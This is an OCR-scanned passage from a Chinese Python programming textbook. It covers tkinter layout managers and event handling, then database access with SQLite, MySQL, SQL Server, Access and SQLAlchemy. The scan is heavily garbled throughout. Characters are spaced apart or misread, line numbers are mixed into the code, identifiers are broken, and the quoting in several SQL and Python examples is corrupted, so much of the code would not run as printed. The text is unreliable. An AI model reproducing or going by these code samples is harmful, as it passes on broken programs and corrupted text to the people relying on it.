text = 'pack3', 

bg = 'yellow' 

).pack(fill = X,expand = 'no',side = 'bottom',pady = 10, ipadx = 20) 


16. root.mainloop() 


pack() 布 局 管理 器 示例 如 图 8-20 所 示 。 


和 





图 8-20 pack() 布 局 管理 器 示例 


grid() 布 局 管理 器 


grid() 布 局 管理 器 是 以 表格 的 方式 进行 布局 管理 的 。 放 置 组 件 时 ,一 般 指 定 组 件 位 于 
的 行 、 列 以 及 跨行 或 列 的 跨度 , 行 、 列 的 序号 从 0 开始 。grid() 布 局 管理 器 常用 选项 如 表 8-8 





所 示 。 
表 8-8 ”grid() 布 局 管理 器 常用 选项 
column 放置 组 件 的 列 号 





columnspan 


组 件 在 列 方向 上 所 占 的 跨度 ,默认 为 1 





ipadx, ipady 





组 件 的 内 部 间隙 ,含义 同 表 8-7 
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续 表 
选 项 描 述 
padx, pady 组 件 的 外 部 间隙, 含义 同 表 8-7 
row 组 件 所 在 单元 格 的 行 号 
rowspan 从 组 件 所 在 行 算 起 所 占 的 行 的 跨度 
si 若 单元 格 比 组 件 大 , 则 组 件 在 单元 格 的 某 一 边 角 。 左 w、 右 e、 顶 部 n、 底 部 s、 左 上 
nw\ 左 下 sw\ 右 下 se、 右 上 ne、 居中 center, 默 认 center 





使 用 grid() 布 局 管理 器 进行 布局 ,一般 情 况 下 ,使 用 row 指定 组 件 所 在 行 ,column 指定 
组 件 所 在 列 ,columnspan 指定 组 件 跨 列 的 宽度 ,rowspan 指定 组 件 跨行 的 高 度 。 
例 [ch8_3_2_grid_01.py】 


1. #coding:utf-8 

2 from tkinter import * 

3. def ok command(): 

4 username = username entry.get() # 获取 输入 的 用 户 名 
5, print(username) 

6 pw= pw_entry. get() # 获取 输入 的 密码 

3 print(pw) 

8. def cancel command(): 

9. username. set('') # 用 户 名 置 空 

10. pw. set("') # 密码 置 空 

EL username_ entry. focus() # 将 光标 置 于 username_entry 


12. root = Tk() 


13. root.titl 
14. username 


e( ' 登 录 窗 口 ') 
= StringVar() 


15. pw = StringVar() 
16. Label(root，text = ' 用 户 名 : '). grid(row= 0, column= 0) # 置 于 第 1 行 第 1 列 


17. username ， 


18. username | 


entry = Entry(root, textvariable = username) 
entry. grid(row = 0, column = 1, columnspan = 2) # 置 于 第 1 行 第 2 列 , 跨 2 列 


19，Label(root，text = ' 密 码 : '). grid(row= 1,column= 0) # 置 于 第 2 行 第 1 列 
20. pw_entry= Entry(root,textvariable = pw, show='*') 


21. pw_entry. 


grid(row =1，column = 1, columnspan = 2) 


22. bn_ok = Button(root，text = ' 确 定 ', command = ok_command) 
23. bn ok.grid(row= 2, column= 1, ipadx = 10) # 置 于 第 3 行 第 2 列 ,内 间隙 为 10 


24. bn cancel 
25. bn cancel 


= Button(root，text = ' 重 置 ', command = cancel_command) 
.grid(row = 2, column = 2, ipadx = 10) 


26. root.mainloop() 


grid() 布 局 管理 器 示例 如 图 8-21 所 示 。 








图 8-21 grid() 布 局 管理 器 示例 


8.3.3 place() 布 局 管理 器 


place() 布 局 管理 器 使 用 绝对 坐标 来 放置 组 件 ,place() 可 以 指定 组 件 的 x、y 位 置 及 大 
小 。 布 局 时 因 涉 及 窗口 的 缩放 、 跨 平台 等 因素 ,使 用 pack() 与 grid() 会 更 简单 方便 ,因此 不 
建议 使 用 place()。 但 在 组 件 容 器 中 实现 定制 布局 管理 器 ,或 者 在 对 话 框 中 放置 按钮 时 使 用 
place() 较 方便 。place() 布 局 管理 器 常用 选项 如 表 8-9 所 示 。 


表 8-9 place() 布 局 管理 器 常用 选项 




















xyy 组 件 放置 的 绝对 位 置 坐标 
relx, rely 组 件 放置 的 相对 坐标 
文字 对 象 的 对 齐 方式 : 左 w、 右 e、 顶 部 n\ 底 部 s、 左 上 nw、 左下 sw、 右 下 se、 右 上 ne、 居中 
anchor > 
center, 默 认 center 
height 高 度 , 单 位 为 像素 
width 宽度 ,单位 为 像素 


例 [ch8_3_3_place_01. py】 


oAWDNDr 


#coding:utf—8 

from tkinter import * 

root = Tk() 

lbl = Label(root, text = ' 绝 对 位 置 x= 60,y= 30') 

lbl.place(x= 60,y= 30,anchor = ‘nw') 

1b2 = Label(root，text = ' 相 对 位 置 示例 ') 

1b2.place(relx = 0.5,rely = 0.5,anchor = CENTER) # 将 标签 放 到 窗口 的 中 间 
root. mainloop( ) 


place() 布 局 管理 器 示例 如 图 8-22 所 示 。 





图 8-22 place() 布 局 管理 器 示例 


8.4 事件 处 理 


事件 是 针对 应 用 程序 发 生 的 事情 ,比如 ,项 击 了 一 个 键 , 单 击 或 拖 动 了 鼠标 ,应 用 程序 需 
要 对 此 做 出 反应 。 处 理事 件 的 函数 称 为 事件 处 理 函 数 ,把 事件 处 理 函数 与 事件 关联 起 来 称 
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为 绑 定 。 绑 定 有 下 列 三 个 层次 。 


(1) 实例 绑 定 : 将 事件 响应 绑 定 到 指定 的 组 件 ,使 用 "组 件 . bind (sequence, func， 


add)”。 


(2) 类 绑 定 : 将 事件 响应 绑 定 到 一 个 类 型 下 的 全 部 组 件 ,使 用 bind_class (class， 


sequence，func，add) 。 


(3) 应 用 绑 定 : 当 事 件 发 生 时 ,无 论 应 用 的 哪个 组 件 在 焦点 状态 下 ,都 会 产生 处 理 器 响 


应 ,使 用 *bind_all(sequence, func, add)”。 


事件 序列 : 是 包含 一 个 或 多 个 事件 模板 的 字符 串 。 
事件 模板 : 二 [modifier-]...type[-detail] 二 。 


(1) 事件 模板 放 在 二 二 中 。 


(2) type 表示 事件 的 类 型 ,如 Key Press 或 Mouse Click 。 
(3) modifier 可 以 增加 一 些 组 合 操作 ,如 Shift 或 Control。 
(4) detail 描述 具体 的 Key, 对 于 鼠标 而 言 指 代 哪个 键 ,1 指 代 Button 1, 即 鼠标 左 键 ; 2 
指 代 Button 2, 即 鼠标 中 键 ; 3 指 代 Button 3, 即 鼠标 右键 。 


下 面 是 一 个 例子 。 
二 Button-1 二 : 鼠标 左 键 。 
二 KeyPress-H: 键盘 H 键 。 


过 Control-Shift-KeyPress-H 放 : 键盘 的 Ctrl 十 Shift 十 H 组 合 键 。 


常用 的 事件 类 型 如 表 8-10 所 示 。 
表 8-10 常用 的 事件 类 型 


















































事 件 描 述 
Activate 组 件 从 非 激活 状态 到 激活 状态 
Button 单 击 鼠 标 按键 
ButtonRelease 松 开 鼠标 按键 
Deactivate 组 件 由 激活 状态 变 成 非 激活 状态 
Enter 用 户 将 鼠标 指针 移动 到 组 件 上 
FocusIn 组 件 获得 输入 的 焦点 
FocusOut 焦点 从 组 件 上 移出 
KeyPress 用 户 按 键盘 上 的 键 
KeyRelease 用 户 松 开 键盘 上 的 按键 
Leave 用 户 将 鼠标 指针 移出 组 件 
Map 组 件 变 得 可 见 
Motion 用 户 将 整个 鼠标 指针 移入 组 件 
MouseWheel 用 户 滑 动 鼠 标 滚轮 
Unmap 组 件 变 得 不 可 见 
Visibility 当 应 用 的 某 部 分 在 屏幕 上 变 得 可 见 


常见 的 事件 修饰 语 如 表 8-11 所 示 。 
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表 8-11 常见 的 事件 修饰 语 


























Alt Alt 键 

Any 任意 的 按键 

Control Ctrl 键 

Double 双击 

Caps_Lock Caps Lock 键 

Shift Shift 键 

Triple Triple kill, 和 Double 一 样 的 原理 


事件 处 理 器 可 以 是 一 个 函数 ,也 可 以 是 一 个 类 的 方法 。 可 以 传递 一 个 Event 对 象 ,通知 
事件 的 产生 。 如 : 


def hanglerName(event) : 
def handlerName( self, event): 


处 理事 件 时 ,可 以 根据 事件 的 一 些 属性 做 进一步 的 处 理 , 常 见 的 事件 属性 如 表 8-12 
所 示 。 


表 8-12 常见 的 事件 属性 



































char KeyPress 和 KeyRelease Event,char 被 设 为 该 character 

height 表示 widget 的 新 的 height( 像 素 ) 

keycode KeyPress 和 KeyRelease Event, 表 示 数 字 按 键 的 值 

num 鼠标 按键 ,1、2、3 

time 两 次 事件 发 生 的 时 间 间 隔 

width Configure Event, 表 示 widget 的 新 的 width( 像 素 ) 

x 当 事 件 发 生 时 ,鼠标 指针 所 在 处 的 坐标 ,以 组 件 的 左上 角 为 原点 

Ed 当 事 件 发 生 时 ,鼠标 指针 所 在 处 的 y 坐标 ,以 组 件 的 左上 角 为 原点 

x_root 当 事 件 发 生 时 ,鼠标 指针 所 在 处 的 z 坐标 ,以 屏幕 的 左上 角 为 原点 

y_root 当 事 件 发 生 时 ,鼠标 指针 所 在 处 的 y 坐标 ,以 屏幕 的 左上 角 为 原点 
捕捉 鼠标 事件 : 


例 [ch8_4_event_01. py】 


#coding:utf -8 
from tkinter import * 
def bn command(event): 
print(" 鼠 标的 坐标 为 : %d, %d"% (event.x, event.y)) # 获 取 鼠 标的 坐标 
root = Tk() 
root. title(" 事 件 示例 ") 
root. bind( '< Button — 1>',bn command) 井 Button - 1 表示 鼠标 左 键 
root.mainloop() 


oo wouwwN PP 





民生 国字 村 入 30917 

鼠标 的 坐标 为 : 36,95 
图 8-23 捕捉 鼠标 事件 示例 

捕捉 键盘 事件 : 

例 [chg_4_event_02. py】 


#coding:utf -8 
from tkinter import * 
def key_press(event) : 


ww Nb 


root = Tk() 

root. title(" 事 件 示 例 ") 

root. bind( '< KeyPress >', key_press) 
root. mainloop( ) 


捕捉 键盘 事件 示例 如 图 8-24 所 示 。 


o ~、 ou 





按 下 的 键 为 : df 刍 信 为 68 
技 下 的 键 为: £ 链 值 为 70 
图 8-24 捕捉 键盘 事件 示例 


习 题 


一 、 选 择 题 
1. 要 在 Label 组 件 中 显示 位 图 ,可 以 使 用 ( ) 属 性 。 
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print(" 按 下 的 键 为 : % s， 键 值 为 $ d" % (event. char, event. keycode)) 


# 获 取 按 下 的 键 及 键 值 


并 KeyPress 表示 按键 盘 上 的 键 
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A. picture B. bitmap C. image D. img 
双 : 革 ) 组 件 用 于 在 窗口 中 输入 单行 文本 。 

A. Entry B. Label C. Text D. Button 
3.(  ) 方 法 以 绝对 坐标 的 方式 布局 组 件 。 

A. pack() B. grid() C. place() D. mainloop() 
二 、 简 答题 


1. 简 述 Python 的 几 种 GUI 开发 库 。 
2. 简 述 Tkinter GUI 程序 设计 步骤 。 
3. 简 述 三 种 窗 体 的 布局 管理 方法 。 


9.1 Python 数据 库 应 用 程序 接口 (DB-APDJ) 


Python 提供 了 数据 库 应 用 程序 接口 (DB-API) ,方便 程序 员 以 统一 的 方式 访问 各 种 数 
据 库 ,DB-API 规范 提供 了 一 些 特性 、 属 性 与 函数 。 下 面 做 简要 介绍 。 
1. connect() 方 法 


connect() 方 法 生成 一 个 Connect 对 象 ,通过 该 对 象 访问 数据 库 ,connect() 方 法 的 使 用 
如 下 所 示 : 


驱动 名 . connect(host = ' 主 机 IP', user = ' 用 户 名 ', passwd = ' 密 码 ', db = ' 数 据 库 名 ', port = 端口 ， 
charset = ' 编 码 方式 ') 


connect() 方 法 需要 的 参数 如 表 9-1 所 示 。 
表 9-1 connect() 方 法 需要 的 参数 




















参 数 名 参数 值 
host 主机 名 /IP 
user 用 户 名 
password 密码 
port 数据 库 的 连接 端口 
charset 数据 库 连接 编码 
2. 连接 对 象 


与 数据 库 建立 连接 以 后 ,会 生成 一 个 连接 对 象 ,该 对 象 把 命令 传输 给 数据 库 服 务 器 ,并 
从 服务 器 接收 数据 。 连 接 对 象 的 方法 如 表 9-2 所 示 。 
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表 9-2 连接 对 象 的 方法 

















方 法 名 说 明 

cursor() 连接 建立 与 返回 游标 

commit() 提交 事务 

rollback() 回 滚 事 务 

close() 关闭 与 数据 库 的 连接 
3. 游标 对 象 


连接 建立 后 ,会 返回 一 个 游标 对 象 ,通过 游标 对 象 ,可 以 执行 数据 库 命 令 并 接收 执行 结 
果 。 游 标 对 象 的 方法 与 属性 如 表 9-3 所 示 。 
表 9-3 游标 对 象 的 方法 与 属性 





























对 象 属性 说 明 
callproc(func[ ,args]) 调用 存储 过 程 
excute(op[ ,args]) 执行 一 个 数据 命令 或 查询 
fetchall() 取 回 结果 集中 剩 下 的 所 有 行 
fetchone() 取 回 结果 集中 的 下 一 行 
next() 通过 迭代 对 象 取 回 结 果 集中 的 下 一 行 
rowcount 最 后 一 次 命令 影响 的 行 数 
rownumber 结果 集中 游标 的 索引 
description 以 元 组 的 方式 返回 结果 集 的 列 名 


4. 数据 库 产品 简介 
数据 库 类 型 有 很 多 ,常用 的 数据 库 都 有 哪些 ? Python 是 否 都 支持 呢 ? 下 面 简 要 地 介绍 


= 

商业 关系 型 数据 库 : 

Oracle 甲骨 文公 司 开发 的 大 型 商用 数据 库 。 

DB2 国际 商用 机 器 公司 (IBM) 开 发 的 大 型 商用 数据 库 。 

MS SQL Server 微软 开发 的 商用 数据 库 。 

Informix IBM 推出 的 一 种 关系 型 数据 库 管理 系统 。 

Sybase 美国 Sybase 公司 研制 的 一 种 关系 型 数据 库 管理 系统 。 后 被 SAP 公 
司 收 购 。 

开源 关系 型 数据 库 : 

MySQL 由 瑞典 MySQL AB 公司 开发 ,目前 属于 Oracle 旗下 公司 。 

PostgreSQL 加 州 大 学 伯克利 分 校 计算 机 系 开发 的 对 象 关系 型 数据 库 管 理 系 统 
(ORDBMS). 

SQLite D. RichardHipp 开发 的 轻型 关系 型 数据 库 , 主 要 应 用 于 嵌入 式 系 
统 中 。 

NoSQL 


随 着 互联 网 大 数据 技术 的 发 展 ,NoSQL 技术 应 运 而 生 , 并 出 现 了 不 同 于 传统 商业 关系 
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型 数据 库 的 产品 ,NoSQL 的 含义 是 Not Only SQL, 泛 指 非 关 系 型 数据 库 。NoSQL 分 为 以 
下 几 种 类 型 数据 库 。 

1) 键 值 (Key-Value) 存 储 数据 库 

代表 产品 : Tokyo Cabinet/Tyrant、Redis、Voldemort、Oracle BDB。 

2) 列 存储 数据 库 

代表 产品 : Cassandra、HBase、Riak。 

3) 文档 型 数据 库 

代表 产品 : CouchDB、MongoDB 及 国内 的 SequoiaDB。 

4) 图 形 (Graph) 数 据 库 

代表 产品 : Neo4J .InfoGrid .Infinite Graph。 

常见 的 关系 型 数据 库 Python 都 能 较 好 地 支持 ; NoSQL 产品 中 ,Python 支持 比较 好 的 
是 MongoDB,Python 通过 PyMongoDB 驱动 来 操作 数据 。 


9.2 SQLite 数据 库 应 用 


SQLite 是 一 款 轻型 关系 型 数据 库 , 是 遵守 ACID 的 关系 型 数据 库 管 理 系 统 , 它 包含 在 
一 个 相对 小 的 C 库 中 。 它 是 D. RichardHipp 建立 的 公有 领域 项 目 。 它 的 设计 目标 是 嵌入 
式 的 ,而 且 目 前 已 经 在 很 多 典 人 式 产品 中 使 用 了 , 它 占 用 资源 非常 的 低 ,在 嵌入 式 设 备 中 ,只 
需 几 百 K 的 内 存 就 够 了 。 它 能 够 支持 Windows/Linux/UNIX 等 主流 的 操作 系统 ,目前 为 
第 三 版 SQLite 3。 

Python 目前 已 经 包含 了 SQLite 3, 导 入 SQLite 3 包 即 可 直接 使 用 。 使 用 方法 和 过 程 
如 下 所 示 。 

1. 连接 数据 库 

通过 conneet() 方 法 可 以 连接 或 创建 数据 库 ,命令 格式 如 下 : 

连接 对 象 = sql ite3. connect( 数 据 库 文件 名 ) 

例如 : 

conn = sqlite3.connect( 'E:/MyDB. db') 

数据 库 的 连接 对 象 可 以 进行 的 操作 如 下 。 

9 excute(): 执行 SQL 语句 。 

9 _cursor() :创建 一 个 游标 。 

9 commit() :提交 事务 。 

9 rollback() : 回 滚 事 务 。 

2 close() :关闭 与 数据 库 的 连接 。 

2. 创建 游标 
游标 是 操作 数据 库 中 数据 的 主要 途径 ,创建 方法 为 
游标 对 象 = 连接 对 象 . cursor() 
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例如 : cur 二 conn. cursor() 。 


游标 的 操作 方法 如 下 。 

2 _excute() :执行 SQL 语句 。 

2 fetchall() :返回 一 个 列表 , 取 回 结果 集中 尚未 取 回 的 行 。 

9 fetchone() :返回 结果 集中 的 下 一 行 。 

3. 关闭 连接 

执行 完 所 有 操作 后 ,一定 要 关闭 连接 。 执 行 语法 为 

数据 库 连接 .close() 

例如 : conn. close() 。 

下 面 以 通讯 录 数 据 库 的 创建 及 操作 为 例 , 说 明 SQLite 数据 库 的 使 用 。 
例 [9-1】 创建 SQLite 3 数据 库 及 操作 。 


1. >>> import sqlite3 

2. >>> conn = sqlite3.connect('E:/myaddlist. db') 

3. >>> cur = conn.cursor() 

4. >>> cur.execute(''' create table addresslist( 

5. ... id integer primary key autoincrement, 

6 .. name varchar(20) null, 

7 .. Sex varchar(2) null, 

8 .. Cellphone varchar(11) null, 

9 . qq varchar(10) null, 

10. ... wechat varchar(20) null, 

11. ... address varchar(50) null 

0 

13. >>> cur. execute( ''' insert into addresslist (name, sex, cellphone, qq, wechat, address) 
values(' 张 三 ',' 男 '，'13012345678', '98765'，'13012345678'，' 沈 阳 市 ') '"') 

14. >>> cur. execute(''' insert into addresslist (name, sex, cellphone, qq, wechat, address) 


values( ' 李 四 '，' 女 '，'13087654321', '12345678'，'13087654321'，' 大 连 市 ') …' ) 

15. >>> cur. execute( '''update addresslist set cellphone = '18998765432' where name = ' 李 四 '''') 
16. >>> conn. commit() 

17. >>> conn. close() 


说明: 第 1 行 ,导入 SQLite 3 模块 。 
第 2 行 ,创建 与 数据 库 的 连接 。 

第 3 行 ,建立 一 个 游标 。 

第 4 一 12 行 ,创建 addresslist 表 。 

第 13 一 14 行 , 插 入 两 条 记录 。 

第 15 行 ,修改 李 四 的 手机 号 。 

第 16 行 , 提 交 事 务 。 

第 17 行 ,关闭 与 数据 库 的 连接 。 

显示 数据 库 的 记录 ,代码 见 例 [ch9_2. py】。 
例 [ch9 2. py】 


1.。 提 一 * 一 coding:utf 一 8 一 # 一 
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import sqlite3 
conn = sqlite3.connect('e:/myaddlist. db') 


cur. execute( 'select * from addresslist') 
recordset = cur.fetchall() 


2 

2 

4 

5. cur = conn.cursor() 
6 

bs 

8. for record in recordset: 
9 


lb for field in record: 
10. print(field, end= ', ') 
Es print() 
12. conn. commit() 


13. conn.close() 


(本 说 明 : 第 6 行 ,执行 查询 语 各 。 

第 7 行 , 取 回 所 有 行 。 

第 8 行 ,外 层 循环 访问 结果 集中 的 每 一 行 。 
第 9 行 ,里 层 循环 访问 记录 中 的 每 一 字段 。 
第 10 行 ,打印 每 一 个 字段 的 值 。 


9.3 连接 MySQL 数据 库 


MySQL 是 一 种 开放 源 代 码 的 关系 型 数据 库 管理 系统 (RDBMS) , 它 使 用 结构 化 查询 语 
言 (SQL) 进 行 数据 库 管 理 , 虽 然 MySQL 功能 未 必 很 强大 ,但 因为 它 的 开源 .广泛 传播 ,导致 
很 多 人 都 了 解 到 这 个 数据 库 。MySQL 数据 库 具有 跨 平台 的 特点 ,能 够 在 许多 平台 上 运行 ， 
它 已 成 为 许多 中 小 系统 的 理想 首选 。 

要 连接 MySQL 数据 库 , 需 要 连接 驱动 程序 ,MySQL 数据 库 有 自己 的 Python 驱动 程 
序 ,可 以 直接 下 载 EXE 文件 ,安装 后 即 可 使 用 。 

最 简单 的 安装 方法 是 ,通过 pip 直接 安装 PyMySQL ,在 Windows 的 cmd 窗口 中 输入 
语句 如 下 : 


C:\Python34 > pip install PyMySQL 


如 果 不 能 连接 网 络 ,也 可 以 下 载 安装 包 安 装 , 下 载 的 网 址 是 https://pypi. python. org/ 
pypi/ ,在 页 面 的 右上 角 有 搜索 栏 , 输 入 PyMySQL, 即 可 找到 PyMySQL 0.7.2, 它 既 适 合 于 
Python 2 也 适合 于 Python 3。 下 载 文件 有 两 个 ,选择 编译 后 的 PyMySQL-0. 7. 2-py2. py3- 
none-any. whl 。 


在 cmd 窗口 下 执行 : 
C:\Python34 > pip install PYMYSOL - 0.7.2 - py2.py3 - none- any. whl 


Unpacking c:\python34\pymysql - 0.7.2 - py2.py3 - none — any. whl 
Installing collected packages: PyMySQL 

Successfully installed PyMySQOL 

Cleaning up... 
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然后 ,就 可 以 在 Python 中 引入 PyMySQL 包 了 。 
>>> import pymysql 


如 果 导 入 PyMySQL 时 没有 错误 提示 ,说 明 PySQL 安装 正确 。 
例 [ch9 3mysql. py】 


4 import pymysql 

2. 

3 try: 

4 conn = pymysql. connect(host = '192.168.1.10',user = 'root', passwd = '123456', db = 'mysql', 
port = 3306, charset = "utf8') 

5 cur = conn. cursor() # 获取 一 个 游标 

6. cur. execute("SELECT Host, User FROM user") 

k data = cur. fetchall() 井 取 回 所 有 行 

8 for d in data: 

9 # 注意 int 类 型 需要 使 用 str( ) 函 数 转 义 

10. print("Host: "+str(d[0]) + 'user: '+ str(d[1])) 
半生 

12. cur.close() # 关 闭 游标 

13. conn.close() # 释放 数 据 库 资源 


14. except Exception :print(" 发 生 异 常 ") 


9.4 连接 MS SQL Server 数据 库 


连接 MS SQL Server 数据 库 , 需 要 有 数据 库 的 驱动 程序 ,最 简便 的 安装 方法 是 ,使 用 
pip 安装 ,安装 命令 为 


C:\Python34 > pip install pymssql 


也 可 以 从 网 络 上 下 载 安 装 包 , 网 址 是 https://pypi. python. org/pypi/pymssql/ ,安装 包 
分 32 位 和 64 位 两 种 ,用 于 64 位 系统 的 安装 包 是 pymssql-2. 1. 2-cp34-cp34m-win_amd64. whl， 
用 于 32 位 系统 的 安装 包 是 pymssql-2. 1. 2-cp34-cp34m-win32. whl, 安 装 包 的 安装 命令 如 下 : 


> pip installpymssql ~ 2.1.2— cp34 ~ cp34m— win amd64.whl 
例 [ch9_4_mssql. py】 


井 - * 一 encoding:utf 一 8 一 关 一 
import pymssql 

import codecs 

import sys 


print (sys. getdefaultencoding( )) 

conn = pymssql. connect(host = "192. 168. 1.3", user = "sa", password = "123456", database = " 
test", charset = "utf8") 

8. 井 如 采用 Windows 身份 验证 , 可 使 用 如 下 命令 : 

9. #conn= pymssql.connect(host ="*",database="*",trusted= True) 


ouw 必 swN 


10. cur = conn. cursor() 
和 
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12. cur.execute( 'CREATE TABLE persons( id INT, name NVARCHAR(100))') 
13. insertsql = "INSERT INTO persons([id], [name]) VALUES(1,' 张 小 三 ')" 
14. cur. execute( insertsql) 

15. conn. commit() 


17.cur. execute( 'SELECT * FROM persons') 

18. row = cur.fetchone() 

19. while row: 

20. print "ID= %d, Name= %s" % (row[0], row[1]) 
四 row = cur. fetchone() 

22. conn.close() 


说明: 第 6 行 ,使 用 MS SQL Server 身份 验证 的 话 需要 输入 用 户 名 和 密码 ,host 


是 服务 器 的 IP 地 址 ,如 果 是 本 机 可 以 用 "."。 
第 12 行 ,persons 表 的 name 字段 应 该 设 为 NVARCHAR 类 型 ,使 用 UTF-8 才 不 会 出 
现 乱码 。 


谍 知 识 拓展 : 在 操作 MS SQL Server 时 ,可 能 会 出 现 乱码 ,解决 的 方法 如 下 。 
(1) 在 程序 文件 的 开头 加 #-*#*-encoding:utf-8-*-, 即 让 程序 文件 用 UTF-8 编码 。 


(2) conn = pymssql. connect(host 一 " 关 . x*x. *x. *x*",user="sa", password==" *", 


database 一 "test"，charset 一 "utf8") 中 以 charset 二 "utf8" 指 定 用 UTF-8 编码 。 
(3) 建 表 的 时 候 , 涉 及 中 文 的 字段 用 NVARCHAR 类 型 。 


9.5 连接 MS Access 数据 库 


MS Access 是 微软 Office 套件 中 的 一 个 轻 量 级 桌面 型 数据 库 ,其 在 Windows 环境 下 有 
许多 应 用 ,下 面 通过 实例 介绍 Python 访问 Access 的 方法 。 

访问 Access 数据 库 最 通用 的 方法 是 通过 ODBC 来 完成 。ODBC (Open Database 
Connectivity, 开 放 数 据 库 互 连 ) 是 微软 公司 开放 服务 结构 (Windows Open Services 
Architecture, WOSA) 中 有 关 数 据 库 的 一 个 组 成 部 分 , 它 建立 了 一 组 规范 ,并 提供 了 一 组 对 
数据 库 访 问 的 标准 API。 这 些 API 利用 SQL 来 完成 大 部 分 任务 。ODBC 本 身 也 提供 了 对 
SQL 语言 的 支持 ,用 户 可 以 直接 将 SQL 语句 传 给 ODBC。 

Python 语言 下 ,有 许多 访问 ODBC 的 模块 ,比较 有 名 的 是 PyODBC, 这 里 介绍 一 个 纯 
Python 实现 的 PyPyODBC, 它 带 来 了 极 大 的 兼容 性 ,具有 肉 入 性 和 代码 移植 性 一 一 
PyPyODBC 可 以 运行 在 CPython、IronPython 和 PyPy 虚拟 机 下 ,可 以 运行 在 Windows、 
Linux 平 台 下 ,可 以 运行 在 Python 的 各 个 版 本 下 .可 以 被 嵌入 在 项 目 中 ,而 无 须 在 运行 环境 
额外 编译 和 安装 ODBC 模块 。 它 当前 版 本 号 为 1. 3. 5 ,安装 非常 简单 ,通过 pip 即 可 安装 。 


C:\Python34 > pip install pypyodbc 

>>> import pypyodbc 

首先 创建 一 个 Access 数据 库 , 注 意 路 径 的 表示 方法 ,在 Windows 下 路 径 为 C:\python 
\studentdb. mdb,“\” 在 Python 中 是 转 义 符 , 所 以 用 “\\” 来 表示 “\”。 


>>> pypyodbc. win_create_mdb( 'C:\\python\\studentdb. mdb') 
如 果 数 据 库 已 经 存在 ,上 面 这 句 可 以 省 略 。 接 下 来 连接 mdb 数据 库 。 


>>> conn = pypyodbc.win connect mdb('C:\\python27\\studentdb. mdb') 
>>> cur = conn.cursor() 

>>> cur. execute( '''CREATE TABLE student ( 

ID COUNTER PRIMARY KEY, 

name VARCHAR(25), 

sex VARCHAR(2), 

address VARCHAR(40) ， 

QQ VARCHAR(10), 

wechat VARCHAR(20));""') 

>>> cur. commit() 


向 数据 表 中 插入 几 条 记录 : 

>>> cur. execute( '''INSERT INTO student (name, sex,address, QQ, wechat) 
VALUES(?,?,?3,?3,?3)'"',(' 张 三 ', ' 男 "沈阳 市 皇 关 区 向 阳 街 100 号 '12345678', 'zhangsan')) 
>>> cur. execute( '''INSERT INTO student(name, sex, address, 00, wechat) 
VALUES(?,?,?,?,3)'"',(" 李 四 ', ' 女 ', ' 大 连 市 沙河 口 区 中 山路 188 号 ', '1345678', 'lisi')) 
>>> cur. execute( '''INSERT INTO student (name, sex,address, QQ, wechat) 
VALUES(?,?,?,?3,?)'"',(' 王 五 ', ' 女 鞍山 市 立山 区 黄河 路 58 号 '2345678', 'mawu')) 


可 要 记 住 了 提交 这 些 操作 哟 。 


>>> cur. commit() 
>>> cur. execute( "update student set address = ' 鞍 山 市 立山 区 黄河 路 58 号 ' where name like ' 王 多 '") 
>>> cur. commit( ) 
>>> cur. execute("SELECT x FROM student WHERE name LIKE ' 张 %'") 
>>> for row in cur. fetchall() : 

for field in row: 

print( field, ) 
print() 


1 张 三 男 沈阳 市 皇 姑 区 向 阳 街 100 号 12345678 zhangsan 


>>> cur. close() 
>>> conn. close() 


9.6 对象 -关系 管理 器 (ORM) 


在 关系 型 数据 库 中 ,对 象 的 关系 是 以 表 以 及 表 间 的 参照 来 体现 的 。 表 中 每 个 实体 为 一 
条 记录 ,通过 主键 区 分 每 个 实体 , 表 中 还 可 以 有 被 称 为 外 键 的 列 , 引 用 同一 张 表 或 不 同 表 中 
某 行 的 主键 。 行 之 间 的 这 种 联系 称 为 关系 ,这 是 关系 型 数据 库 模 型 的 基础 。 关 系 型 数据 库 
绝 大 多 数 都 有 Python 接口 ,Python 通过 结构 化 查询 语言 (SQL) 来 操作 数据 库 , 这 种 方式 非 
常 适合 于 有 数据 库 基 础 的 人 ,如 果 你 更 喜欢 面向 对 象 编程 ,能 不 能 把 表 转 换 为 类 ,编程 时 岂 
不 更 加 容易 灵活 ? 

比如 有 student 表 , 其 数据 如 下 : 
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(1) 张 三 , 男 ,19, 沈 阳 市 。 
(2) 李 四 , 女 ,18, 大 连 市 。 
也 可 以 定义 一 个 Student 类 : 
class Student (object): 
def init (self, id, name, sex,age,address): 
self.id = id 
self. name = name 
Self. sex = sex 
self.age = age 
self.address = address 


zhangsan = Student(1,' 张 三 ',' 男 ',19,' 沈 阳 市 ') 
lisi= Student(2，' 李 四 '，' 女 ',18,' 大 连 市 ') 


可 以 看 出 表 和 类 之 间 有 了 一 种 映射 关系 ,把 它 叫 作对 象 -关系 映射 (Object-Relational 
Mapper, ORM) ,把 数据 库 的 表 转 换 成 Python 类 后 ,类 中 具有 列 属 性 和 操作 数据 的 方法 ,类 
不 再 需要 使 用 SQL 也 能 完成 同样 的 任务 。 较 有 名 的 ORM 模块 有 SQLAlchemy 和 
SQLObject 。 

在 面向 对 象 编程 中 ,类 的 操作 显然 比 SQL 更 容易 。 使 用 对 象 -关系 映射 后 ,虽然 编程 操 
作 更 容易 ,但 也 带 来 了 效率 上 的 下 降 , 好 在 随 着 计算 机 处 理 能 力 的 增强 ,可 以 忽略 这 一 点 性 
能 的 降低 ; 使 用 ORM 框架 还 带 来 另外 一 个 好 处 ,针对 不 同 的 数据 库 ,ORM 抽象 层 使 用 相 
同 的 接口 ,例如 ,SQLAlchemy 针对 MySQL .Postgres 和 SQLite 完全 采用 相同 的 接口 来 操 
作 数 据 库 。 


9.6.1 SQLAlchemy 的 使 用 

SQLAlchemy 是 Python ORM 模块 中 优秀 者 之 一 。 下 面 就 来 介绍 SQLAlchemy。 
安装 SQLAlchemy: 

C:\Python34 > pip install SQLAlchemy 

安装 完成 后 ,可 以 通过 以 下 方法 检验 是 否 安 装 成 功 及 版 本 : 


>>> import sqlalchemy 
>>> sqlalchemy._ version __ 


0 


SQLAlchemy 的 使 用 过 程 大 致 如 下 。 
1. 建立 连接 
导入 create_engine, 创 建 连接 引擎 。 


>>> from sqlalchemy import create engine 
>>> engine = create engine('sqlite:///:memory:'，echo = True) 井 使 用 SQLite 在 内 存 中 创建 库 


2. 声明 基 类 ,定义 映射 到 表 的 类 
类 的 映射 是 依赖 于 包含 分 类 信息 的 一 个 基 类 一 一 declarative_base, 应 用 程序 将 使 用 这 
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个 基 类 的 一 个 实例 ,使 用 declarative_base() 函 数 创建 基 类 实例 : 


>>> from sqlalchemy. ext. declarative import declarative base 
>>> Base = declarative base() # 创建 基 类 实例 


